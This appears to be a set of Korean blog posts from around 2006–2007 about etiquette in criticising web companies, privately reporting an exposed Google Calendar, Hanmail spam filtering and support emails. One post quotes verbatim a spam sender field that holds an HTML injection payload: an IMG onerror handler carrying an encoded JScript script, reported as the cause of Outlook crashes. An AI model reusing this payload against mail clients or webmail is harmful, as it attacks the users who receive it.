Channy님이 쓰신 nhn에 대한 글에 대해서~

다음의 윤석찬님이 네이버 일부 페이지의 문제점에 대해 지적하신 점에 대해 nhn쪽에 계신 날밤님께서 꼭 그리 대놓고 까야겠느냐면서 불만을 제기하셨네요. ^^;

음, 제 생각은 이렇습니다. 석찬님께서 지적하신 내용 자체가 틀린 것은 아니라고 생각합니다. 한 회사를 본보기로하여 다른 수많은 사람들이 그런 실수를 하지 않도록 하는 교재(?)로 삼으신 것도 교육의 효율성 면에서 이해가 안되는 것은 아닙니다. 하물며 그 대상이 개인홈페이지가 아니라 자타공인 1위 서비스인 네이버라면 말이죠.

다만 “교재”가 되는 사람 입장에서는 꼭 그렇게 해야만 하는 것이냐는 볼멘 소리가 나올 수도 있습니다. 개인적으로도 그렇고 회사안에서도 아마 한소리 듣거나 할터이니 이왕이면 직접 좀 연락을 해서 문제점을 지적해줬으면 어땠을까 하는 아쉬움이겠지요. 아마 저런 지적이 외부에 나오면 (특히 유명 블로거로부터, ) 어떤 상황이나 분위기가 되는지는 석찬님도 충분히 짐작이 가능하실터이고요.

이에 석찬님께서는 (공개적으로) “개인 블로그에 안올리고” 어떻게 (NHN에) 전달하느냐고 하셨는데요, NHN에 아는 분이 한분이라도 없으신지는 제가 잘 모르겠고,.. 아 진짜 잘 모르겠습니다. 근데 제가 그 입장이라면 회사 안에서 발 넓은 분께 한다리 건너서 NHN에 아는 분 없느냐고 물으실 수도 있지 않았을까 하는 마음이 듭니다. 정말로 전달할 방법이 없어서 블로그에 쓰신 것이라면 말씀이지요.

날밤님과 석찬님의 글을 보니 몇달전 제가 겪었던 비슷한 일이 떠오릅니다.

올해 초의 일이죠. 팀내 스케쥴이나 개인 일정 관리용으로 구글캘린더를 사용하고 있습니다. 많이들 쓰시지요? 그런데 하루는 구글캘린더를 검색하다보니 캘린더를 공개로 설정해놓으셔서 외부에서 검색으로 다 볼수 있게 해두신 분들이 있더라는거죠. 저희 회사의 서비스나 팀, 회의실 이름등으로 검색해보니까 어이쿠 몇분 나오시네요. 이분들께는 바로 내선으로 전화를 걸어서, 또 메신저를 통해서 바로 비공개로 전환하시도록 알려드렸습니다.

이왕 해보는김에 다른 회사는 어떤지 한번 이리저리 검색해봤습니다.

그 와중에서 캘린더를 공개로 해두신 다음커뮤니케이션즈분을 발견하게 되었습니다. 각종 스케쥴을 구글캘린더에 넣어놓고 공개로 해두셨더군요. 이제와 말씀드리지만 그때 관련 게시물을 작성하면서 자료화면으로 사용한 뿌연 캘린더 이미지는 다음의 그 분 캘린더였습니다. 누구신지는 말씀드릴 수 없고요, 검색해서 나온 이분의 캘린더를 보니 회의주제며 만나는 분들로 보아 최소한 팀장급 이상의 직책을 맡은 분 같더군요. 열심히 검색과 수소문을 해서 이분의 이메일 주소를 알아냈습니다. 일면식도 없는 분이지요.

그리고는 메일을 띄웠습니다. 아래는 그때 보낸 메일 원문 그대로입니다. (누구인지 유추하지 못하게 하려고 모자이크 처리를 좀 많이했음을 이해해주시기 바랍니다. )

a_mail_sent_to_someone_in_daum

만약 저도 구글캘린더의 보안설정 부분에 주의를 기울이라고 글을 쓸 때 이 분의 소속과 직위를 공개하고 글을 썼더라면, 적어도 더 교육효과(?)는 있었을 겁니다. 그런데 그렇게 하기보다는 전 위에 쓴 것과 같은 방법을 택했습니다.

이 문제를 발견했을 때 제 목적은 실수한 것과 잘못한 것을 당사자가 알게하면 되는 것이고 아울러 다른 사람도 이런 실수를 하지 않도록 하는 것이었습니다. 딱 거기까지를 목표로 삼는 것이 이 상황의 결말치고는 최선이라고 생각했고요. 뭐 물론 블로그에 대놓고 쓰면 한방에 해결할 수 있었을겁니다. 모른다고 할 수 없는게, 그 대신 누군가는 곤란한 경우를 당해야할 것이라는 사실이겠지요.

저는 석찬님의 풍부한 지식과 넓은 인간관계, 그리고 글도 잘 쓰시고 오픈소스에 기여하신 공로에 대해서 진심으로 부러워하고 또 고마워하고 있습니다. 다만, 간혹(자주는 아니고요 ㅎㅎ) 타 업체에 대해 필요 이상으로 까칠한 표현을 사용하시는 모습을 볼 때면, 딱 표현하고 싶으신 그 표현말고 좀 더 부드럽고, 말하자면 “우아한” 표현은 없었을까 하는 아쉬움이 들 때가 있습니다. 나름 그런 면이 캐릭터시긴 하겠지만 날밤님 말씀처럼 동종업계 사람으로서 섭섭할 때가 있더라구요.

한발짝 더 나가서 제가 드릴려고하는 말씀의 요지는, 좋은게 좋은거니 덮어두자는 얘기를 하려는게 아니라 어떤 상황, 소재를 갖고 이야기를 해나갈때 (같은 뜻으로 “문제를 해결해나가는데”) 이것을 “사람”의 문제로 보고 그 사람이 파렴치하거나 해서 까야겠다, 그래서 (어떤 식으로든) 피해를 줘야겠다. 는 목적이 아니라면 그 사람의 입장과, 나아가 그 회사, 그 서비스, 그 조직에 대한 존중에 좀 더 신경을 써주셨으면 하는 것입니다.

(–)(__)

한메일에 보낸 사람 이름이 이상한지, 아웃룩 다운

아침에 아웃룩을 실행하고 잠시 후에 보니까 아웃룩이 죽어있더군요. 다시 실행해서 보니까 메일을 받다가 그냥 죽어버리네요. 무슨 일일까 싶어서 아웃룩으로 땡겨받는 POP3 계정에 다 들어가 봤습니다.

한메일 중에 의심가는 메일이 하나 있어서 얘를 삭제하고 다시 아웃룩을 실행해보니 문제없이 나머지 메일들을 받는군요.

메일은 열어보지 않았습니다만 글자 제목은 칼라고 (아마 한메일내에 있는 기능이 아닐까 싶네요.) 보낸 사람 이름에 마우스를 대보니 뭔가 범상치 않은 문자열이 미리보기에 나타납니다. 이게 혹시 원인이 아닐까 싶은데 아웃룩에서 이런 메일을 잘 받도록 고치는 것보다 한메일쪽에서 대책을 마련해주시는 편이 빠를 것 같네요.

이 글 보신 분 중에 혹시 한메일쪽에 아는 분 있으시면 이 포스트 좀 전달해주시길…

[업데이트]@2007.06.07 16:00
확실한 것 같군요. 또 비슷한 메일이 왔는데 아웃룩이 새 메일 받아오다가 죽습니다. 정확히 말해서 받아오기는 받아오는데 죽고나서 또 받아오다가 죽네요.
보낸이 메일 주소가 이렇게 되어 있습니다.

도박왕< <IMG src=” “ONERROr= “klopp=’%3Cscript%20lang
uage%20%3D%22JScript.Encode%22%3E%23@%7E%5EfwAAAA%3D%3DOK
w%20%5EW1lYbW%09%20tM+W%27rtOw%21%21
%21F*-8v%21%3DwT*FzuvwETT2%25w%21WXvw
-T*lG-T%7FW-%3B%21Z+l-%3BZ%212v-8%212wEZ
%21+*+%2CwTW*-Z%7FG%27E%21Zf%7F%5D%27
EZ%21fvXwZcX%20AY-Zv%7Ff%27E%21T+lvfJ5iEAA
A%3D%3D%5E%23%7E@%3C/script%3E’; koko = ”;
for(k=0;k>도박왕

(실제로는 엔터없이 한줄로 이어져있습니다.)

스팸제로2.0의 지능지수는…

한메일에서는 사용자가 스팸메일이라고 버튼을 눌러 지정하면 다음부터는 유사한 형태의 메일을 자동으로 스팸으로 처리하도록 학습한다는 스팸제로2.0을 서비스 중이다.

그러나 아래와 같은 메일이 오늘 받은편지함으로 들어왔는데 이전에도 이와 유사한 –한메일을 이용해서 보내서 제목에 색깔을 넣었고, 제목 문자열(회원님, 은행, 대 츌, 우수고객)이 거의 같은– 메일을 꽤 여러번 스팸지정한 적이 있다.

20060219_hanmail_spam.png

대체 얼만큼 클릭질을 해서 학습을 시켜야 지능적으로 스팸을 차단할 수 있는 것일까? 나는 이미 의심하기 시작했고 이 의심이 확신으로 바뀌는 순간 더 이상 –머리 나쁜–지능형스팸차단 학습프로그램에 동참하지 않고 그냥 필터링 규칙에 “대 츌”을 추가하고 말 것이다.

사용자 자신에게 돌아오는 이익이 없다면 아무리 뻐근한 목표를 갖고 만든 기능이건 서비스건, 상호작용은 일어나지 않는다. 이것은 “남을 위한 태깅”이 절대 성공하지 못하는 이유기도 하다.

PS//
글 작성하자마자 든 생각인데 사용자의 신고를 받는 한메일의 스팸학습시스템은 한메일로 들어오는 메일의 양과 그 중 사용자로부터 신고되는 스팸의 양을 비교할 때 무시할 수 있는 수준, 즉 한메일의 스팸오염 정도는사용자의 피드백으로 자정할 수 있는 한계를 넘어섰거나 그러한 한계를 넘어설 수 있는만큼의 피드백이 일어나지 않고 있을 수도 있다. 1억통의 메일중 9천9백9십만통이 스팸이고 이 중 50통만이 신고되고 있다면 “스팸의심지수”는 0에 수렴하므로 스팸/정상메일을 구분하는 변별력이 사라진다는 뜻이다. 썬더버드의 스팸지정 버튼도 같은 동작을 하지만 스팸제로2.0과 비교할 수 없이 잘 동작하는 것과 딜리셔스의 추천태그가 그럭저럭 도움이 되는 것을 보면 이 추측은 더 뽐뿌를 받는다.

[업데이트]#1@22:50
20060219_hanmail_spam2.png

알았어 -_-; 알았다고 ;;

[업데이트]#2@2월27일 07시55분
spam_20060226.png

-_-;;

깔끔한 메일 vs 미사여구 메일

DELL 컴퓨터의 A/S -neosigma-

외국계 기업이라 그런지 주고 받는 이메일에 군더더기가 없고 조금은 딱딱하다. 마치 회사에서 업체와 메일 주고 받는 느낌이다. 그래도 필요한 말만 있고 원하는 대답을 해주니 깔끔해서 좋다. 왜 우리나라 업체들의 이메일들은 시작과 끝이 엄청난 미사여구로 꾸며져 있고 그림들도 이쁘게 장식되어 있지않은가.

“엄청난 미사여구”의 메일이란 아마 이런 것이 아닐까?

신록이 찬란한 정렬의 계절 8월입니다.

안녕하세요. Daum 커뮤니케이션 한메일넷 담당자 ㅇㅇㅇ입니다.

먼저 사용자님의 기대에 부흥하지 못하고 서비스 이용에 불편을 드린 점 사과를 드립니다.

한메일넷을 이용하시는 과정에서 한메일넷과 관련된 불편사항을 말씀하셨습니다.
현재 보내주신 오류를 개발자에게 확인 요청을 의뢰하였습니다. 신속하게 답변을 드려야 하나, 문제 확인 시간이 지연되어 고객님께 큰 불편을 드린 점은 저희가 머리 숙여 사과 드립니다.
이에 회신이 오는데로 바로 답변을 드리도록 하겠습니다.

앞으로도 더 나은 서비스로 회원님께 다가가도록, 저희 운영/개발진 모두 최선을 다하겠습니다.

사용 중 불편을 끼쳐 대단히 죄송합니다.

다른 궁금하신 사항은 언제든지 문의해 주시면 성실히 답변해 드리겠습니다.

고객님과 늘 함께하는 Daum이 되도록 노력하겠습니다.

웃음은 가장 좋은 화장이고, 건강법이며, 인생의 약이라고 합니다.
오늘 하루도 활짝 웃는 하루 보내시기 바랍니다.